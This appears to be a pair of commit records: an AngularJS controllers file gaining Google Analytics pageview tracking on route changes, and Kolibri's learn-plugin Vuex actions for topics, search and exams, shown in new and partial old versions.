collectTerms(list) { var terms = list.filter(function (item) { return item.term; }).map(function (item) { return item.term; }); return terms; } $scope.queryParams = function () { var taxa = collectTerms($scope.queryTaxonValues); var entities = collectTerms($scope.queryEntityValues); var matchAllEntities; return { taxa: taxa, matchAllTaxa: false, entities: entities, matchAllEntities: $scope.parameters.matchAllEntities }; } $scope.searchTaxa = Autocomplete.taxa; $scope.searchEntities = Autocomplete.entities; $scope.applyQueryFilter = function () { $scope.queryDirty = false; $scope.applyQuery(); } var initiallyClean = true; $scope.$watch('queryParams() | json', function (value) { if (!initiallyClean) { $scope.queryDirty = true; } initiallyClean = false; $scope.parameters = _.extend($scope.parameters, $scope.queryParams()); }); $scope.$watch('selectedPage', function (value) { $location.path(value.href); }); $scope.$watch('parameters', function (value) { mapParameters(); }); $scope.queryDirty = false; mapParameters(); }) .controller('CommonGroupController', function ($scope, TaxonCommonGroup) { $scope.smallImage = function (iri) { if (iri) { var uuid = iri.replace("http://phylopic.org/image/", "").replace("/", ""); return "http://phylopic.org/assets/images/submissions/" + uuid + ".64.png"; } else { return ""; } }; $scope.group = TaxonCommonGroup.query({iri: $scope.taxon}); }) .controller('TaxonNameController', function ($scope, Taxon) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.taxonInfo = Taxon.query({iri: $scope.iri}); } }); $scope.isGenusOrSpecies = function (taxon) { if (taxon) { if (taxon.rank) { return (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000005") || (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000006"); } else { return false; } } }; }) .controller('TermNameController', function ($scope, Label) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.term = Label.query({iri: $scope.iri}); } }); }) 
.controller('CountedPhenotypesForTaxonController', function ($scope, TaxonPhenotypesQuery, OMN) { var params = {total: true}; params.taxon = $scope.taxon['@id']; params.entity = OMN.angled($scope.entity['@id']); params.parts = $scope.parts; params.homologs = $scope.homologs; if ($scope.quality) { params.quality = OMN.angled($scope.quality['@id']); } $scope.count = TaxonPhenotypesQuery.query(params); }) .controller('CountedPresenceOrAbsenceForTaxonController', function ($scope, EntityPresenceEvidence, EntityAbsenceEvidence, OMN) { var params = {total: true, taxon: $scope.taxon['@id'], entity: $scope.entity['@id']}; if ($scope.kind == 'presence') { $scope.count = EntityPresenceEvidence.query(params); } else { $scope.count = EntityAbsenceEvidence.query(params); } }) .controller('CharacterDescriptionAnnotationController', function ($scope, Label, PhenotypeAnnotations, CharacterDescriptionWithAnnotation) { $scope.description = CharacterDescriptionWithAnnotation.query({iri: $scope.iri}); // $scope.phenotype = Label.query({iri: $scope.iri}); $scope.eqs = PhenotypeAnnotations.query({iri: $scope.iri}); }) .controller('ClassificationController', function ($scope, $filter, Classification) { $scope.classification = Classification.query({iri: $scope.iri, definedBy: $scope.definedBy}); $scope.linkMaker = $filter($scope.linkFilter); }) .controller('SimilarityViewController', function ($scope, SimilarityMatches, SimilarityAnnotationMatches, ProfileSize, SimilarityCorpusSize) { $scope.maxSize = 3; $scope.matchesPage = 1; $scope.matchesLimit = 20; $scope.pageChanged = function () { $scope.queryTopMatches(); } $scope.matchesTotal = SimilarityCorpusSize.query({corpus_graph: $scope.corpusGraph}); //FIXME this query is too slow! //$scope.matchesTotal = {total: 1000}; $scope.queryTopMatches = function () { $scope.queryProfileSize = ProfileSize.query({iri: $scope.subject['@id']}); $scope.selectedMatch = null; $scope.topMatches = SimilarityMatches.query({ corpus_graph: $scope.corpusGraph, iri: $scope.subject['@id'], limit: $scope.matchesLimit, offset: ($scope.matchesPage - 1) * $scope.matchesLimit }); }; $scope.selectMatch = function (match) { $scope.selectedMatch = match; $scope.annotationMatches = null; $scope.selectedMatchProfileSize = ProfileSize.query({iri: match.match_profile['@id']}); $scope.annotationMatches = SimilarityAnnotationMatches.query({ corpus_graph: $scope.corpusGraph, query_graph: $scope.queryGraph, query_iri: $scope.subject['@id'], corpus_iri: match.match_profile['@id']} ); }; // $scope.selectedMatch = null; // $scope.annotationMatches = null; // $scope.queryProfileSize = null; // $scope.matchesPage = 1; // $scope.selectedMatchProfileSize = null; $scope.$watch("subject['@id']", function (value) { if (value) { $scope.queryTopMatches(); } }); }) .controller('VisualizationController', function ($scope, $q, TaxaWithPhenotype, OMN) { $scope.$watch('structures', function (newValue, oldValue) { queryNewData(); }); $scope.$watch('values', function (newValue, oldValue) { updateSpec(); }); $scope.structures = [ {'@id': "http://purl.obolibrary.org/obo/UBERON_0003097", label: "dorsal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000164", label: "caudal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_2000251", label: "adipose fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000163", label: "anal fin"} ]; function queryNewData() { var allTaxonCounts = $scope.structures.map(function (item) { return { structure: item, result: TaxaWithPhenotype.query({ entity: OMN.angled(item['@id']), 
total: true})}; }); var allTaxonCountPromises = allTaxonCounts.map(function (item) { return item.result.$promise; }); $q.all(allTaxonCountPromises).then(function (data) { $scope.values = allTaxonCounts.map(function (item) { return { category: item.structure.label, amount: item.result.total }; }); }); } function updateSpec() { $scope.spec = { "width": 400, "height": 200, "padding": {"top": 10, "left": 50, "bottom": 20, "right": 10}, "data": [ { "name": "table", "values": $scope.values } ], "signals": [ { "name": "tooltip", "init": {}, "streams": [ {"type": "rect:mouseover", "expr": "datum"}, {"type": "rect:mouseout", "expr": "{}"} ] } ], "predicates": [ { "name": "tooltip", "type": "==", "operands": [{"signal": "tooltip._id"}, {"arg": "id"}] } ], "scales": [ { "name": "xscale", "type": "ordinal", "range": "width", "domain": {"data": "table", "field": "category"} }, { "name": "yscale", "range": "height", "nice": true, "domain": {"data": "table", "field": "amount"} } ], "axes": [ { "type": "x", "scale": "xscale" }, { "type": "y", "scale": "yscale" } ], "marks": [ { "type": "rect", "from": {"data":"table"}, "properties": { "enter": { "x": {"scale": "xscale", "field": "category"}, "width": {"scale": "xscale", "band": true, "offset": -1}, "y": {"scale": "yscale", "field": "amount"}, "y2": {"scale": "yscale", "value":0} }, "update": { "fill": {"value": "steelblue"} }, "hover": { "fill": {"value": "red"} } } }, { "type": "text", "properties": { "enter": { "align": {"value": "center"}, "fill": {"value": "#333"} }, "update": { "x": {"scale": "xscale", "signal": "tooltip.category"}, "dx": {"scale": "xscale", "band": true, "mult": 0.5}, "y": {"scale": "yscale", "signal": "tooltip.amount", "offset": -5}, "text": {"signal": "tooltip.amount"}, "fillOpacity": { "rule": [ { "predicate": {"name": "tooltip", "id": {"value": null}}, "value": 0 }, {"value": 1} ] } } } } ] }; } }) ;
Configure AngularJS to send URL changes to Google Analytics.
js/controllers.js
Configure AngularJS to send URL changes to Google Analytics.
<ide><path>js/controllers.js <ide> /* Controllers */ <ide> <ide> angular.module('pkb.controllers', ['ui.bootstrap']) <del>.controller('AppController', function ($scope, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { <add>.controller('AppController', function ($scope, $window, $location, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { <add> $scope.$on('$routeChangeSuccess', function() { <add> $window.ga('set', 'page', $location.url()); <add> $window.ga('send', 'pageview'); <add> console.log("route change: " + $location.url()) <add> }); <add> <ide> $scope.clickLink = function () { <ide> $scope.clearSearch(); <ide> };
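The diff above registers pageview tracking inside AppController: each $routeChangeSuccess event points the tracker at the current $location.url() and sends a pageview through the global ga() function. The same pattern is often registered once in a module run block rather than per controller; the following is a minimal sketch of that variant, assuming the standard analytics.js snippet has already defined window.ga and that a router firing $routeChangeSuccess (such as ngRoute) is in use. The module name 'myApp' is a placeholder and is not part of the record above.

// Minimal sketch (assumptions: window.ga exists and ngRoute is loaded).
// 'myApp' is a hypothetical module name used only for illustration.
angular.module('myApp', ['ngRoute'])
  .run(['$rootScope', '$window', '$location', function ($rootScope, $window, $location) {
    $rootScope.$on('$routeChangeSuccess', function () {
      if ($window.ga) {
        // Point the tracker at the new URL, then record the pageview.
        $window.ga('set', 'page', $location.url());
        $window.ga('send', 'pageview');
      }
    });
  }]);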
JavaScript
mit
cafb73476ef024a9973e4388ec56b76e9079cf34
0
benjaoming/kolibri,benjaoming/kolibri,benjaoming/kolibri,DXCanas/kolibri,learningequality/kolibri,christianmemije/kolibri,christianmemije/kolibri,mrpau/kolibri,indirectlylit/kolibri,DXCanas/kolibri,jonboiser/kolibri,learningequality/kolibri,lyw07/kolibri,christianmemije/kolibri,learningequality/kolibri,jonboiser/kolibri,jonboiser/kolibri,lyw07/kolibri,indirectlylit/kolibri,DXCanas/kolibri,learningequality/kolibri,benjaoming/kolibri,indirectlylit/kolibri,jonboiser/kolibri,lyw07/kolibri,indirectlylit/kolibri,mrpau/kolibri,mrpau/kolibri,lyw07/kolibri,mrpau/kolibri,christianmemije/kolibri,DXCanas/kolibri
import { ContentNodeResource, ContentNodeProgressResource, UserExamResource, ExamLogResource, ExamAttemptLogResource, } from 'kolibri.resources'; import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; import { setChannelInfo, handleApiError, samePageCheckGenerator, } from 'kolibri.coreVue.vuex.actions'; import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; import { PageNames } from '../../constants'; import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; import { now } from 'kolibri.utils.serverClock'; import ConditionalPromise from 'kolibri.lib.conditionalPromise'; import router from 'kolibri.coreVue.router'; import seededShuffle from 'kolibri.lib.seededshuffle'; import prepareLearnApp from '../prepareLearnApp'; import { createTranslator } from 'kolibri.utils.i18n'; const name = 'topicTreeExplorationPageTitles'; const messages = { topicsForChannelPageTitle: 'Topics - { currentChannelTitle }', currentTopicForChannelPageTitle: '{ currentTopicTitle } - { currentChannelTitle }', currentContentForChannelPageTitle: '{ currentContentTitle } - { currentChannelTitle }', contentUnavailablePageTitle: 'Content Unavailable', searchPageTitle: 'Search', examsListPageTitle: 'Exams', currentExamPageTitle: '{ currentExamTitle} - { currentChannelTitle }', }; const translator = createTranslator(name, messages); /** * Vuex State Mappers * * The methods below help map data from * the API to state in the Vuex store */ function _crumbState(ancestors) { // skip the root node return ancestors.slice(1).map(ancestor => ({ id: ancestor.pk, title: ancestor.title, })); } function validateProgress(data) { if (!data.progress_fraction) { return 0.0; } else if (data.progress_fraction > 1.0) { return 1.0; } return data.progress_fraction; } function _topicState(data, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, description: data.description, thumbnail: thumbnail.storage_url, breadcrumbs: _crumbState(ancestors), parent: data.parent, kind: data.pk === data.channel_id ? 
ContentNodeKinds.CHANNEL : data.kind, progress, channel_id: data.channel_id, }; return state; } function contentState(data, nextContent, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, kind: data.kind, description: data.description, thumbnail: thumbnail.storage_url, available: data.available, files: data.files, progress, breadcrumbs: _crumbState(ancestors), content_id: data.content_id, next_content: nextContent, author: data.author, license: data.license, license_description: data.license_description, license_owner: data.license_owner, parent: data.parent, lang: data.lang, channel_id: data.channel_id, }; Object.assign(state, assessmentMetaDataState(data)); return state; } function _collectionState(data) { return data.map(item => { if (item.kind === ContentNodeKinds.TOPIC) { return _topicState(item); } return contentState(item); }); } function _examState(data) { const state = { id: data.id, title: data.title, channelId: data.channel_id, active: data.active, archive: data.archive, closed: data.closed, answerCount: data.answer_count, questionCount: data.question_count, score: data.score, }; return state; } function _examLoggingState(data) { const state = { id: data.id, closed: data.closed, }; return state; } /** * Cache utility functions * * These methods are used to manipulate client side cache to reduce requests */ function updateContentNodeProgress(channelId, contentId, progressFraction) { /* * Update the progress_fraction directly on the model object, so as to prevent having * to cache bust the model (and hence the entire collection), because some progress was * made on this ContentNode. */ const model = ContentNodeResource.getModel(contentId); model.set({ progress_fraction: progressFraction }); } function setAndCheckChannels(store) { return setChannelInfo(store).then(channels => { if (!channels.length) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); } return channels; }); } /** * Actions * * These methods are used to update client-side state */ function showChannels(store) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_ROOT); setAndCheckChannels(store).then( channels => { if (!channels.length) { return; } const channelRootIds = channels.map(channel => channel.root); ContentNodeResource.getCollection({ ids: channelRootIds }).fetch().then(rootNodes => { const pageState = { rootNodes: _collectionState(rootNodes), }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); }); }, error => { handleApiError(store, error); } ); } function showTopicsTopic(store, id, isRoot = false) { store.dispatch('CORE_SET_PAGE_LOADING', true); if (isRoot) { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); } else { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_TOPIC); } const topicPromise = ContentNodeResource.getModel(id).fetch(); const childrenPromise = ContentNodeResource.getCollection({ parent: id, }).fetch(); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([topicPromise, childrenPromise, ancestorsPromise, channelsPromise]).only( samePageCheckGenerator(store), ([topic, children, ancestors]) => { const currentChannel = getChannelObject(store.state, topic.channel_id); if (!currentChannel) { router.replace({ name: 
PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { isRoot: isRoot, }; pageState.channel = currentChannel; pageState.topic = _topicState(topic, ancestors); const collection = _collectionState(children); pageState.contents = collection; store.dispatch('SET_PAGE_STATE', pageState); // Topics are expensive to compute progress for, so we lazily load progress for them. const subtopicIds = collection .filter(item => item.kind === ContentNodeKinds.TOPIC) .map(subtopic => subtopic.id); if (subtopicIds.length) { const topicProgressPromise = ContentNodeProgressResource.getCollection({ ids: subtopicIds, }).fetch(); topicProgressPromise.then(progressArray => { store.dispatch('SET_TOPIC_PROGRESS', progressArray); }); } store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); if (isRoot) { store.dispatch( 'CORE_SET_TITLE', translator.$tr('topicsForChannelPageTitle', { currentChannelTitle: currentChannel.title }) ); } else { store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentTopicForChannelPageTitle', { currentTopicTitle: pageState.topic.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } function showTopicsChannel(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); showTopicsTopic(store, id, true); } function showTopicsContent(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CONTENT); const contentPromise = ContentNodeResource.getModel(id).fetch(); const nextContentPromise = ContentNodeResource.fetchNextContent(id); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([ contentPromise, channelsPromise, nextContentPromise, ancestorsPromise, ]).only( samePageCheckGenerator(store), ([content, channels, nextContent, ancestors]) => { const currentChannel = getChannelObject(store.state, content.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { content: contentState(content, nextContent, ancestors), channel: currentChannel, }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentContentForChannelPageTitle', { currentContentTitle: pageState.content.title, currentChannelTitle: currentChannel.title, }) ); }, error => { handleApiError(store, error); } ); } function triggerSearch(store, searchTerm) { if (!searchTerm) { const searchState = { searchTerm, topics: [], contents: [], }; store.dispatch('SET_PAGE_STATE', searchState); return; } const contentCollection = ContentNodeResource.getPagedCollection({ search: searchTerm }); const searchResultsPromise = contentCollection.fetch(); searchResultsPromise .then(results => { const searchState = { searchTerm }; searchState.contents = _collectionState(results); store.dispatch('SET_PAGE_STATE', searchState); store.dispatch('CORE_SET_PAGE_LOADING', false); }) .catch(error => { handleApiError(store, error); }); } function clearSearch(store) { store.dispatch('SET_PAGE_STATE', { topics: [], contents: [], searchTerm: '', }); } function showContentUnavailable(store) { store.dispatch('SET_PAGE_NAME', PageNames.CONTENT_UNAVAILABLE); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); 
store.dispatch('CORE_SET_TITLE', translator.$tr('contentUnavailablePageTitle')); } function showSearch(store, searchTerm) { store.dispatch('SET_PAGE_NAME', PageNames.SEARCH); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('searchPageTitle')); clearSearch(store); setAndCheckChannels(store).then(channels => { if (!channels.length) { return; } if (searchTerm) { triggerSearch(store, searchTerm); } else { store.dispatch('CORE_SET_PAGE_LOADING', false); } }); } function showExamList(store) { const userIsLoggedIn = isUserLoggedIn(store.state); store.dispatch('SET_PAGE_NAME', PageNames.EXAM_LIST); store.dispatch('CORE_SET_PAGE_LOADING', true); // if user is not logged in, this action is a noop if (!userIsLoggedIn) { store.dispatch('CORE_SET_PAGE_LOADING', false); return Promise.resolve(); } return UserExamResource.getCollection().fetch().only( samePageCheckGenerator(store), exams => { const pageState = {}; pageState.exams = exams.map(_examState); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('examsListPageTitle')); }, error => { handleApiError(store, error); } ); } function calcQuestionsAnswered(attemptLogs) { let questionsAnswered = 0; Object.keys(attemptLogs).forEach(key => { Object.keys(attemptLogs[key]).forEach(innerKey => { questionsAnswered += attemptLogs[key][innerKey].answer ? 1 : 0; }); }); return questionsAnswered; } function showExam(store, id, questionNumber) { if (store.state.pageName !== PageNames.EXAM) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.EXAM); } if (!store.state.core.session.user_id) { store.dispatch('CORE_SET_ERROR', 'You must be logged in as a learner to view this page'); store.dispatch('CORE_SET_PAGE_LOADING', false); } else { questionNumber = Number(questionNumber); // eslint-disable-line no-param-reassign const examPromise = UserExamResource.getModel(id).fetch(); const examLogPromise = ExamLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); const examAttemptLogPromise = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); ConditionalPromise.all([ examPromise, examLogPromise, examAttemptLogPromise, setAndCheckChannels(store), ]).only( samePageCheckGenerator(store), ([exam, examLogs, examAttemptLogs]) => { const currentChannel = getChannelObject(store.state, exam.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const attemptLogs = {}; if (store.state.core.session.user_id) { if (examLogs.length > 0 && examLogs.some(log => !log.closed)) { store.dispatch('SET_EXAM_LOG', _examLoggingState(examLogs.find(log => !log.closed))); } else { const examLogModel = ExamLogResource.createModel({ user: store.state.core.session.user_id, exam: id, closed: false, }); examLogModel.save().then(newExamLog => { store.dispatch('SET_EXAM_LOG', newExamLog); ExamLogResource.unCacheCollection({ user: store.state.core.session.user_id, exam: id, }); }); } // Sort through all the exam attempt logs retrieved and organize them into objects // keyed first by content_id and then item id under that. 
if (examAttemptLogs.length > 0) { examAttemptLogs.forEach(log => { if (!attemptLogs[log.content_id]) { attemptLogs[log.content_id] = {}; } attemptLogs[log.content_id][log.item] = Object.assign({}, log); }); } } const seed = exam.seed; const questionSources = exam.question_sources; // Create an array of objects with contentId and assessmentItemIndex // These will be used to select specific questions from the content node // The indices referred to shuffled positions in the content node's assessment_item_ids // property. // Wrap this all in a seededShuffle to give a consistent, repeatable shuffled order. const shuffledQuestions = seededShuffle.shuffle( createQuestionList(questionSources), seed, true ); if (!shuffledQuestions[questionNumber]) { // Illegal question number! handleError(store, `Question number ${questionNumber} is not valid for this exam`); } else { const contentPromise = ContentNodeResource.getCollection({ ids: questionSources.map(item => item.exercise_id), }).fetch(); contentPromise.only( samePageCheckGenerator(store), contentNodes => { const contentNodeMap = {}; contentNodes.forEach(node => { contentNodeMap[node.pk] = node; }); const questions = shuffledQuestions.map(question => ({ itemId: selectQuestionFromExercise( question.assessmentItemIndex, seed, contentNodeMap[question.contentId] ), contentId: question.contentId, })); if (questions.every(question => !question.itemId)) { // Exam is drawing solely on malformed exercise data, best to quit now handleError(store, `This exam has no valid questions`); } else { const itemId = questions[questionNumber].itemId; const channelId = exam.channel_id; const currentQuestion = questions[questionNumber]; const questionsAnswered = Math.max( store.state.pageState.questionsAnswered || 0, calcQuestionsAnswered(attemptLogs) ); const pageState = { exam: _examState(exam), itemId, questions, currentQuestion, questionNumber, content: contentState(contentNodeMap[questions[questionNumber].contentId]), channelId, questionsAnswered, }; if (!attemptLogs[currentQuestion.contentId]) { attemptLogs[currentQuestion.contentId] = {}; } if (!attemptLogs[currentQuestion.contentId][itemId]) { attemptLogs[currentQuestion.contentId][itemId] = { start_timestamp: now(), completion_timestamp: null, end_timestamp: null, item: itemId, complete: false, time_spent: 0, correct: 0, answer: null, simple_answer: '', interaction_history: [], hinted: false, channel_id: channelId, content_id: currentQuestion.contentId, }; } pageState.currentAttempt = attemptLogs[currentQuestion.contentId][itemId]; store.dispatch('SET_EXAM_ATTEMPT_LOGS', attemptLogs); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentExamPageTitle', { currentExamTitle: pageState.exam.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } }, error => { handleApiError(store, error); } ); } } function setAndSaveCurrentExamAttemptLog(store, contentId, itemId, currentAttemptLog) { // As soon as this has happened, we should clear any previous cache for the // UserExamResource - as that data has now changed. 
UserExamResource.clearCache(); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: currentAttemptLog, }), }); const pageState = Object.assign(store.state.pageState); pageState.currentAttempt = currentAttemptLog; store.dispatch('SET_PAGE_STATE', pageState); // If a save has already been fired for this particular attempt log, // it may not have an id yet, so we can look for it by its uniquely // identifying fields, contentId and itemId. let examAttemptLogModel = ExamAttemptLogResource.findModel({ content_id: contentId, item: itemId, }); const attributes = Object.assign({}, currentAttemptLog); attributes.user = store.state.core.session.user_id; attributes.examlog = store.state.examLog.id; // If the above findModel returned no matching model, then we can do // getModel to get the new model instead. if (!examAttemptLogModel) { examAttemptLogModel = ExamAttemptLogResource.createModel(attributes); } const promise = examAttemptLogModel.save(attributes); return promise.then( newExamAttemptLog => new Promise((resolve, reject) => { const log = Object.assign({}, newExamAttemptLog); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: log, }), }); const questionsAnswered = calcQuestionsAnswered(store.state.examAttemptLogs); store.dispatch('SET_QUESTIONS_ANSWERED', questionsAnswered); const examAttemptLogCollection = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: store.state.pageState.exam.id, }); // Add this attempt log to the Collection for future caching. examAttemptLogCollection.set(examAttemptLogModel); resolve(); }) ); } function closeExam(store) { const examLog = Object.assign({}, store.state.examLog); examLog.closed = true; return ExamLogResource.getModel(examLog.id).save(examLog).catch(error => { handleApiError(store, error); }); } export { setAndCheckChannels, contentState, showChannels, showTopicsChannel, showTopicsTopic, showTopicsContent, showContentUnavailable, triggerSearch, clearSearch, showSearch, showExam, showExamList, setAndSaveCurrentExamAttemptLog, closeExam, prepareLearnApp, updateContentNodeProgress, };
kolibri/plugins/learn/assets/src/state/actions/main.js
import { ContentNodeResource, ContentNodeProgressResource, SessionResource, UserExamResource, ExamLogResource, ExamAttemptLogResource, } from 'kolibri.resources'; import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; import { setChannelInfo, handleApiError } from 'kolibri.coreVue.vuex.actions'; import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; import { PageNames } from '../../constants'; import { samePageCheckGenerator } from 'kolibri.coreVue.vuex.actions'; import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; import { now } from 'kolibri.utils.serverClock'; import ConditionalPromise from 'kolibri.lib.conditionalPromise'; import router from 'kolibri.coreVue.router'; import seededShuffle from 'kolibri.lib.seededshuffle'; import prepareLearnApp from '../prepareLearnApp'; import { createTranslator } from 'kolibri.utils.i18n'; const name = 'topicTreeExplorationPageTitles'; const messages = { topicsForChannelPageTitle: 'Topics - { currentChannelTitle }', currentTopicForChannelPageTitle: '{ currentTopicTitle } - { currentChannelTitle }', currentContentForChannelPageTitle: '{ currentContentTitle } - { currentChannelTitle }', contentUnavailablePageTitle: 'Content Unavailable', searchPageTitle: 'Search', examsListPageTitle: 'Exams', currentExamPageTitle: '{ currentExamTitle} - { currentChannelTitle }', }; const translator = createTranslator(name, messages); /** * Vuex State Mappers * * The methods below help map data from * the API to state in the Vuex store */ function _crumbState(ancestors) { // skip the root node return ancestors.slice(1).map(ancestor => ({ id: ancestor.pk, title: ancestor.title, })); } function validateProgress(data) { if (!data.progress_fraction) { return 0.0; } else if (data.progress_fraction > 1.0) { return 1.0; } return data.progress_fraction; } function _topicState(data, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, description: data.description, thumbnail: thumbnail.storage_url, breadcrumbs: _crumbState(ancestors), parent: data.parent, kind: data.pk === data.channel_id ? 
ContentNodeKinds.CHANNEL : data.kind, progress, channel_id: data.channel_id, }; return state; } function contentState(data, nextContent, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, kind: data.kind, description: data.description, thumbnail: thumbnail.storage_url, available: data.available, files: data.files, progress, breadcrumbs: _crumbState(ancestors), content_id: data.content_id, next_content: nextContent, author: data.author, license: data.license, license_description: data.license_description, license_owner: data.license_owner, parent: data.parent, lang: data.lang, channel_id: data.channel_id, }; Object.assign(state, assessmentMetaDataState(data)); return state; } function _collectionState(data) { return data.map(item => { if (item.kind === ContentNodeKinds.TOPIC) { return _topicState(item); } return contentState(item); }); } function _examState(data) { const state = { id: data.id, title: data.title, channelId: data.channel_id, active: data.active, archive: data.archive, closed: data.closed, answerCount: data.answer_count, questionCount: data.question_count, score: data.score, }; return state; } function _examLoggingState(data) { const state = { id: data.id, closed: data.closed, }; return state; } /** * Cache utility functions * * These methods are used to manipulate client side cache to reduce requests */ function updateContentNodeProgress(channelId, contentId, progressFraction) { /* * Update the progress_fraction directly on the model object, so as to prevent having * to cache bust the model (and hence the entire collection), because some progress was * made on this ContentNode. */ const model = ContentNodeResource.getModel(contentId); model.set({ progress_fraction: progressFraction }); } function setAndCheckChannels(store) { return setChannelInfo(store).then(channels => { if (!channels.length) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); } return channels; }); } /** * Actions * * These methods are used to update client-side state */ function showChannels(store) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_ROOT); setAndCheckChannels(store).then( channels => { if (!channels.length) { return; } const channelRootIds = channels.map(channel => channel.root); ContentNodeResource.getCollection({ ids: channelRootIds }).fetch().then(rootNodes => { const pageState = { rootNodes: _collectionState(rootNodes), }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); }); }, error => { handleApiError(store, error); } ); } function showTopicsTopic(store, id, isRoot = false) { store.dispatch('CORE_SET_PAGE_LOADING', true); if (isRoot) { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); } else { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_TOPIC); } const topicPromise = ContentNodeResource.getModel(id).fetch(); const childrenPromise = ContentNodeResource.getCollection({ parent: id, }).fetch(); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([topicPromise, childrenPromise, ancestorsPromise, channelsPromise]).only( samePageCheckGenerator(store), ([topic, children, ancestors]) => { const currentChannel = getChannelObject(store.state, topic.channel_id); if (!currentChannel) { router.replace({ name: 
PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { isRoot: isRoot, }; pageState.channel = currentChannel; pageState.topic = _topicState(topic, ancestors); const collection = _collectionState(children); pageState.contents = collection; store.dispatch('SET_PAGE_STATE', pageState); // Topics are expensive to compute progress for, so we lazily load progress for them. const subtopicIds = collection .filter(item => item.kind === ContentNodeKinds.TOPIC) .map(subtopic => subtopic.id); if (subtopicIds.length) { const topicProgressPromise = ContentNodeProgressResource.getCollection({ ids: subtopicIds, }).fetch(); topicProgressPromise.then(progressArray => { store.dispatch('SET_TOPIC_PROGRESS', progressArray); }); } store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); if (isRoot) { store.dispatch( 'CORE_SET_TITLE', translator.$tr('topicsForChannelPageTitle', { currentChannelTitle: currentChannel.title }) ); } else { store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentTopicForChannelPageTitle', { currentTopicTitle: pageState.topic.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { 